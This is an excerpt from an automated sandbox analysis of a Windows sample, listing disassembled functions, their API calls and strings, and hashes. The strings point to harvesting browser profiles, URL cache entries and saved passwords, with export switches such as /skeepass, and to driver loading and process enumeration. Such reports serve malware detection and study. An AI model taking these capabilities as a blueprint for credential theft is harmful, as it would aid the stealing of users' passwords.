                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                        • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                        • API String ID: 2454223109-1580313836
                                                                        • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                        • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                        • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                        • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                        • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                        • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+v@Fv@Bv
                                                                        • API String ID: 667068680-1085305157
                                                                        • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                        • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                        • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                        • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                        APIs
                                                                          • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                        • SetMenu.USER32(?,00000000), ref: 00411453
                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                        • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                        • ShowWindow.USER32(?,?), ref: 004115FE
                                                                        • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                        • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                          • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                          • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                        • API String ID: 4054529287-3175352466
                                                                        • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                        • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                        • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                        • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                        • API String ID: 1607361635-601624466
                                                                        • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                        • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                        • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                        • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                        • API String ID: 2000436516-3842416460
                                                                        • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                        • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                        • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                        • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                        APIs
                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                          • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                          • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                          • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                        • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                        • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                        • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                        • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                        • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                        • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                        • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                        • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                        • String ID:
                                                                        • API String ID: 1043902810-0
                                                                        • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                        • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                        • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                        • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                        APIs
                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                        • free.MSVCRT ref: 0040E49A
                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                        • memset.MSVCRT ref: 0040E380
                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                        • wcschr.MSVCRT ref: 0040E3B8
                                                                        • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                        • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                        • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                        • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                        • API String ID: 3849927982-2252543386
                                                                        • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                        • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                        APIs
                                                                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                        • _snwprintf.MSVCRT ref: 0044488A
                                                                        • wcscpy.MSVCRT ref: 004448B4
                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@??3@_snwprintfwcscpy
                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                        • API String ID: 2899246560-1542517562
                                                                        • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                        • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                        • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                        • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040DBCD
                                                                        • memset.MSVCRT ref: 0040DBE9
                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                          • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                          • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                          • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                        • wcscpy.MSVCRT ref: 0040DC2D
                                                                        • wcscpy.MSVCRT ref: 0040DC3C
                                                                        • wcscpy.MSVCRT ref: 0040DC4C
                                                                        • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                        • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                        • wcscpy.MSVCRT ref: 0040DCC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                        • API String ID: 3330709923-517860148
                                                                        • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                        • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                        • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                        • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                        • memset.MSVCRT ref: 004085CF
                                                                        • memset.MSVCRT ref: 004085F1
                                                                        • memset.MSVCRT ref: 00408606
                                                                        • strcmp.MSVCRT ref: 00408645
                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                        • memset.MSVCRT ref: 0040870E
                                                                        • strcmp.MSVCRT ref: 0040876B
                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                        • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                        • String ID: ---
                                                                        • API String ID: 3437578500-2854292027
                                                                        • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                        • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                        • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                        • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041087D
                                                                        • memset.MSVCRT ref: 00410892
                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                        • GetSysColor.USER32(0000000F), ref: 00410999
                                                                        • DeleteObject.GDI32(?), ref: 004109D0
                                                                        • DeleteObject.GDI32(?), ref: 004109D6
                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                        • String ID:
                                                                        • API String ID: 1010922700-0
                                                                        • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                        • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                        • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                        • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                        APIs
                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                        • malloc.MSVCRT ref: 004186B7
                                                                        • free.MSVCRT ref: 004186C7
                                                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                        • free.MSVCRT ref: 004186E0
                                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                        • malloc.MSVCRT ref: 004186FE
                                                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                        • free.MSVCRT ref: 00418716
                                                                        • free.MSVCRT ref: 0041872A
                                                                        • free.MSVCRT ref: 00418749
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free$FullNamePath$malloc$Version
                                                                        • String ID: |A
                                                                        • API String ID: 3356672799-1717621600
                                                                        • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                        • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                        • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                        • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp
                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                        • API String ID: 2081463915-1959339147
                                                                        • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                        • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                        • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                        • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                        APIs
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
